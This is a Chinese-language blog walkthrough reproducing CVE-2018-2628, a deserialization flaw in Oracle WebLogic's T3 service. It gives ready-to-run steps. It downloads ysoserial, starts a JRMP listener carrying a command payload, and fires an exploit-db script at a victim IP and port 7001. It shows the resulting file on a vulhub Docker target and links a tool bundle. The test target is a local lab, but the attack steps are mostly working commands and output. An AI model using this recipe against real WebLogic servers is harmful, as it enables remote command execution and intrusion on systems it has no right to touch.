此漏洞产生于Weblogic T3服务,当开放Weblogic控制台端口(默认为7001端口)时,T3服务会默认开启,因此会造成较大影响。
漏洞编号:
CVE-2018-2628
漏洞原理:
由于原理占用篇幅很大,浪费大家很多时间,目前网上也有很多详细的分析,在这里就不做『搬运工』了,直接给大家参考连接:
http://blog.topsec.com.cn/ad_lab/cve-2018-2628-weblogic%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E% E5%88%86%E6%9E%90/
http://www.freebuf.com/vuls/169420.html
https://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
漏洞复现:
1、首先需要下载一个国外大佬写的一款工具ysoserial(http://www.vuln.cn/6295,这里有针对这款工具的分析)。
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
2、使用ysoserial启动一个JRMP Server
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
【listen port】是JRMP Server 监听的端口
【Command】是想要执行命令
3、使用exp向目标发送数据包。 (脚本链接:https://www.exploit-db.com/exploits/44553/)
zksmile@xxx:~$ python CVE-2018-2628.py
Usage:
exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
[victim ip] :目标IP
[victim port] : 目标端口
[path to ysoserial] : ysoserial的路径
[JRMPListener ip] : 步骤2中 攻击机器的IP
[JRMPListener port]: 步骤2中监听的端口
[JRMPClient] :使用的是JRMPClient类
zksmile@xxx:~$ python CVE-2018-2628.py 172.18.0.2 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 172.18.0.1 1099 JRMPClient
4、进入docker 容器中,文件已经创建成功。
zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
9989f9948b12 vulhub/weblogic "startWebLogic.sh" 7 hours ago Up 7 hours 5556/tcp, 0.0.0.0:7001->7001/tcp cve-2018-2628_weblogic_1
zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker exec -ti 9989f9948b12 /bin/bash
root@9989f9948b12:~/Oracle/Middleware# ls /tmp/
bea1061393648233859820.tmp hsperfdata_root wlstTemproot
cookie.txt packages zksmile.txt
root@9989f9948b12:~/Oracle/Middleware#
5、文中用到脚本工具在下边压缩包中。
http://zone.secevery.com/file/download/file_name-emtzbWlsZS56aXA=__url-aHR0cDovL3pvbmUuc2VjZXZlcnkuY29tL3VwbG9hZHMvYXJ0aWNsZS8yMDE4MDgyMi84NzdiODExODM2NDQ0MTNhY2E1ZDQ1OGNlNDNiYjM0YQ==
閱讀更多 Web安全陪跑團 的文章
